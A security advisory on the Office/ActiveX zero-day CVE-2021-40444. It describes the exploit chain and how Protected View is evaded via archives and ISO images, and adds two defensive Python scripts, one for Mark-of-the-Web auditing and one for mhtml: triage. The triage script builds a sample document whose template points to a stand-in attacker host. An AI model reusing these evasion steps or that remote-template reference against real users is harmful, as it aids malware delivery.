UPDATE: MITIGATIONS BYPASSED
--
Summary:
The Windows zero-day CVE-2021-40444 is being actively exploited in attacks. It was disclosed on Tuesday with few details and is still awaiting an official patch. The flaw is triggered through malicious ActiveX controls embedded in documents opened by Windows applications, including Microsoft Office 365 and Office 2019, and can be used to install malware on an affected computer.
Security researchers have discovered several malicious Word documents used in the attacks, shedding some light on how the vulnerability is exploited. Microsoft has released mitigations, but it appears these can be bypassed.
Analyst Comments:
In most cases Microsoft Office's "Protected View" feature will block the exploit, but if a user clicks "Enable Editing" the attack proceeds.
Microsoft Office checks whether a document carries the "Mark of the Web" (MoTW), a tag indicating that it originated from the Internet. If the tag is present, the document opens in read-only Protected View until the user clicks "Enable Editing."
These defenses have two weaknesses. First, users can be lured into enabling editing, which lets the malicious document run. Second, threat actors have ways of delivering a document without the MoTW tag, which negates the protection entirely.
"If the document is in a container that is processed by something that is not MotW-aware, then the fact that the container was downloaded from the Internet will be moot. For example, if 7Zip opens an archive that came from the Internet, the extracted contents will have no indication that it came from the Internet. So no MotW, no Protected View. Similarly, if the document is in a container like an ISO file, a Windows user can simply double-click on the ISO to open it. But Windows doesn't treat the contents as having come from the Internet. So again, no MotW, no Protected View. This attack is more dangerous than macros because any organization that has chosen to disable or otherwise limit macro execution will still be open to arbitrary code execution simply as the result of opening an Office document" (Bleeping Computer, 2021).
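The MoTW behaviour described above can be checked directly on disk. The following is an added example (not code from the advisory or from Bleeping Computer) that audits a directory of Office and RTF files for the Zone.Identifier alternate data stream that carries the MoTW on NTFS. A file extracted from a 7-Zip archive or copied out of a mounted ISO will show has_motw false, which is exactly the "no MotW, no Protected View" case. The Zone.Identifier sample in the docstring is constructed; the set of file suffixes and the use of the "path:Zone.Identifier" open syntax (Windows only) are assumptions of the example.

```python
"""Audit Office documents for the Mark of the Web (MoTW).

Added example; not code from the original advisory. On NTFS the MoTW is an
alternate data stream named Zone.Identifier, which Python can open with the
"path:Zone.Identifier" syntax on Windows. Files produced by a tool that is
not MoTW-aware (7-Zip extraction, the contents of a double-clicked ISO) have
no such stream, so Office opens them outside Protected View.
"""
import json
import os
import sys
from pathlib import Path
from typing import Dict, List, Optional

# Document types the advisory discusses (Word .docx and RTF) plus the other
# Office formats Protected View covers. This list is an assumption; adjust it.
OFFICE_SUFFIXES = {".doc", ".docx", ".docm", ".dot", ".dotx", ".dotm", ".rtf",
                   ".xls", ".xlsx", ".xlsm", ".ppt", ".pptx", ".pptm"}

# URL security zone identifiers written into the stream by the downloading app.
URLZONE_INTERNET = 3
URLZONE_UNTRUSTED = 4


def parse_zone_identifier(text: str) -> Dict[str, str]:
    """Parse the INI-style Zone.Identifier stream into a dict.

    A stream written by a browser looks like this (constructed sample):
        [ZoneTransfer]
        ZoneId=3
        ReferrerUrl=https://example.test/
        HostUrl=https://example.test/letter.docx
    """
    fields: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def read_zone_identifier(path: Path) -> Optional[str]:
    """Return the raw Zone.Identifier stream, or None when the file has none.

    Opening "<file>:Zone.Identifier" raises FileNotFoundError both when the
    stream is absent on NTFS and on filesystems without ADS support.
    """
    try:
        with open(f"{path}:Zone.Identifier", "r", encoding="utf-8",
                  errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def protected_view_expected(fields: Dict[str, str]) -> bool:
    """Office uses Protected View when ZoneId is Internet (3) or Restricted (4)."""
    try:
        return int(fields.get("ZoneId", "-1")) in (URLZONE_INTERNET, URLZONE_UNTRUSTED)
    except ValueError:
        return False


def audit_directory(root) -> List[Dict[str, object]]:
    """Walk *root* and describe every Office/RTF file's MoTW status.

    Entries with has_motw == False are the dangerous case from the advisory:
    a document extracted from an archive or ISO that Office will open fully
    enabled, with no "Enable Editing" prompt between the user and the exploit.
    """
    findings: List[Dict[str, object]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if path.suffix.lower() not in OFFICE_SUFFIXES:
                continue
            stream = read_zone_identifier(path)
            fields = parse_zone_identifier(stream) if stream is not None else {}
            findings.append({
                "path": str(path),
                "has_motw": stream is not None,
                "zone_id": fields.get("ZoneId"),
                "host_url": fields.get("HostUrl"),
                "protected_view": protected_view_expected(fields),
            })
    return findings


if __name__ == "__main__":
    # Usage: python motw_audit.py C:\Users\someone\Downloads
    for finding in audit_directory(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(json.dumps(finding))
```

Run it against a Downloads folder and against the extraction directory of an archive that came from the same e-mail: the downloaded archive carries ZoneId=3, the documents extracted from it do not, which is why the latter open straight into an editable, exploitable state.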
The vulnerability can also be delivered in RTF files, which do not benefit from the Protected View feature.
Earlier this week Microsoft released mitigations that disable ActiveX controls in Internet Explorer, which would block the known attack chain, but security researchers have found ways around these mitigations. With the mitigations bypassed, CVE-2021-40444 is more severe than originally thought. Microsoft may be able to ship a fix in next Tuesday's monthly Patch Tuesday release; until then, users must rely on not falling for the phishing and social-engineering lures that deliver the exploit.
Mitigation:
No patch exists yet and the published mitigations have been bypassed. Until a patch or further mitigations are released, the primary defense is user vigilance against phishing attachments related to CVE-2021-40444. Protected View remains the main technical control: leave it enabled, treat any prompt to "Enable Editing" on an unexpected document as hostile, and remember that documents delivered inside archives or ISO images arrive without the MoTW and will not open in Protected View at all.
"One of the known malicious Word attachments used in the attacks is named 'A Letter before court 4.docx' and claims to be a letter from an attorney. Since the file was downloaded from the Internet, it will be tagged with the 'Mark of the Web' and opened in Protected View" (Bleeping Computer, 2021).
"Once a user clicks on the 'Enable Editing' button, the exploit will open a URL using the 'mhtml' protocol to a 'side.html' file hosted at a remote site, which is loaded as a Word template. As 'mhtml' URLs are registered to Internet Explorer, the browser will start to load the HTML, and its obfuscated JavaScript code will exploit the CVE-2021-40444 vulnerability by creating a malicious ActiveX control. This ActiveX control will download a ministry.cab file from a remote site, extract a championship.inf file (actually a DLL), and execute it as a Control Panel 'CPL' file" (Bleeping Computer, 2021).
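The first step of that chain, the document's remote mhtml: reference, is visible without opening the file in Word. The following is an added example (not code from the advisory or from Bleeping Computer) that unpacks a .docx, lists every relationship marked TargetMode="External", and flags any target using the mhtml: scheme; for non-zip formats such as the RTF variant mentioned above it falls back to a byte scan for mhtml: URLs. The sample package it builds is constructed: the hostname is a placeholder, and modelling the reference as an attachedTemplate relationship in word/_rels/settings.xml.rels (mirroring the "loaded as a Word template" wording above) is an assumption; the check keys on the URL scheme, not on the relationship type.

```python
"""Triage a document for the remote mhtml: load described above.

Added example; not code from the original advisory or from Bleeping Computer.
A .docx is a zip package whose remote references live in *.rels parts as
Relationship elements with TargetMode="External". The exploit documents point
such a target at an mhtml: URL so that the fetch is handled by Internet
Explorer's engine rather than by Word. The package built below is a
constructed stand-in: the hostname is a placeholder and the relationship type
(attachedTemplate) is an assumption; the check flags the scheme, not the type.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

PKG_REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
MHTML_URL_RE = re.compile(rb"mhtml:[^\s\"'<>]+", re.IGNORECASE)


def external_relationships(package: bytes) -> List[Dict[str, str]]:
    """List every TargetMode="External" relationship in an OOXML package."""
    found: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a damaged .rels part deserves a manual look; skip it here
            for rel in root.iter(PKG_REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                found.append({
                    "part": name,
                    "id": rel.get("Id", ""),
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target", ""),
                })
    return found


def scan_bytes_for_mhtml(data: bytes) -> List[str]:
    """Byte-level fallback for non-zip formats such as RTF: any mhtml: URL."""
    return [m.decode("latin-1") for m in MHTML_URL_RE.findall(data)]


def triage(data: bytes) -> Dict[str, object]:
    """Report external references and whether an mhtml: target is present."""
    if zipfile.is_zipfile(io.BytesIO(data)):
        rels = external_relationships(data)
        mhtml = [r["target"] for r in rels if r["target"].lower().startswith("mhtml:")]
        return {"format": "ooxml", "external": rels, "mhtml": mhtml,
                "suspicious": bool(mhtml)}
    mhtml = scan_bytes_for_mhtml(data)
    return {"format": "other", "external": [], "mhtml": mhtml,
            "suspicious": bool(mhtml)}


def build_sample_docx() -> bytes:
    """Constructed minimal package shaped like the exploit documents."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
        'Target="mhtml:http://attacker.invalid/side.html" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    import json
    # Constructed inputs: a docx with the mhtml: external target, and an RTF-like blob.
    print(json.dumps(triage(build_sample_docx()), indent=2))
    print(json.dumps(triage(b"{\\rtf1\\ansi plain text mhtml:http://attacker.invalid/side.html }"), indent=2))
```

Any external relationship is worth reviewing in an unsolicited document, since a legitimate letter rarely needs to fetch anything from the Internet; the mhtml: scheme is the specific tell for this chain because it hands the URL to Internet Explorer's engine instead of Word. Because this looks at the file rather than at the user's "Enable Editing" decision, it also catches documents that arrived without the MoTW.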
Trend Micro reports that the final payload is a Cobalt Strike beacon, giving the threat actor remote access to the device. From there the attacker can move laterally through the network, install additional malware, steal files, or deploy ransomware.
Given the severity of this vulnerability, users are strongly advised not to open attachments unless they come from a trusted source.
Source:
https://www.bleepingcomputer.com/ne...ro-day-defenses-bypassed-as-new-info-emerges/